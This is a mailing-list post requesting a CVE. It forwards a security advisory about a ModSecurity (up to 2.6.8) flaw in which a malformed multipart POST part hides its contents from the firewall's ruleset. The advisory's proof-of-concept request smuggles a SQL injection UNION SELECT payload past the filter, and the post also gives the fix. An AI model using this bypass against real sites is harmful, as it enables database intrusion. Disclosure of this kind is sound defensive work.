Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 17 Oct 2012 10:47:52 +0200
From: Matthias Weckbecker <>
Subject: CVE request: Fwd: [Full-disclosure] SEC Consult SA-20121017-0 :: ModSecurity multipart/invalid part ruleset bypass

Hi Steve, Kurt, vendors,

this flaw looks slightly different from the last one and apparently has not
got a CVE yet. 

----------  Forwarded Message  ----------

Subject: [Full-disclosure] SEC Consult SA-20121017-0 :: ModSecurity 
multipart/invalid part ruleset bypass
Date: Wednesday 17 October 2012
From: SEC Consult Vulnerability Lab <>

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >
              title: ModSecurity multipart/invalid part ruleset bypass
            product: ModSecurity
 vulnerable version: <= 2.6.8
      fixed version: 2.7.0
         CVE number: -
             impact: Depends what you use it for
              found: 2012-10-12
                 by: Bernhard Mueller
                     SEC Consult Vulnerability Lab

Vendor/product description:
ModSecurity for Apache is a web server plug-in for the Apache web server
platform. This is the original, most mature and deployed ModSecurity module.
This module is maintained by the Trustwave SpiderLabs Research Team.


Vulnerability overview/description:
Validation of POST parameters can be bypassed on Apache/PHP installations by
sending specially formed multipart requests. A POST parameter's content can be
hidden from ModSecurity by prepending an invalid part. This first part
contains only a Content-Disposition header and has an additional carriage
return inserted at the end of the line ([\r\r\n]). This is followed by a
boundary in the next line and another Content-Disposition header with a
filename. The request content looks like this (newlines are all \r\n except in
line 2).

Content-Disposition: form-data; name="id"[\r][\r][\n]
Content-Disposition: form-data; name="lol"; filename="x"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--


ModSecurity skips what it believes to be an invalid first part and proceeds to
parse the second part. This part is treated as a file and not checked against
the ruleset.

PHP however treats the whole thing as a single part and processes only the
first Content-Disposition header, ignoring the second one. In the opinion of
PHP this request contains a POST parameter with the name specified in the
first header.

Proof of concept:


<? echo $POST[xxx] ?>

POST request:

POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161

Content-Disposition: form-data; name="xxx"[\r][\r][\n]
Content-Disposition: form-data; name="yyy"; filename="z"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--



1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

(any change in the header should produce a 403)

Vulnerable / tested versions:

This works with ModSecurity up to version 2.6.8.

Vendor contact timeline:
2012-10-11: Contacted ModSecurity
2012-10-15: ModSecurity guys fixed it
2012-10-16: New ModSecurity release 2.7.0
2012-10-17: Public release of advisory

To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation
rule. Add the line:


to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.

Download is available at:

Advisory URL:

The SEC Consult Group

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com

Office Singapore
4 Battery Road
#25-01 Bank of China Building
Singapore (049908)
Mail: office at sec-consult dot sg

Check out our blog at:

And this thing here:

EOF B. Mueller / October 2012

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -


Matthias Weckbecker, Senior Security Engineer, SUSE Security Team
SUSE LINUX Products GmbH, Maxfeldstr. 5, D-90409 Nuernberg, Germany
Tel: +49-911-74053-0;
SUSE LINUX Products GmbH, GF: Jeff Hawn, HRB 16746 (AG Nuernberg) 

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ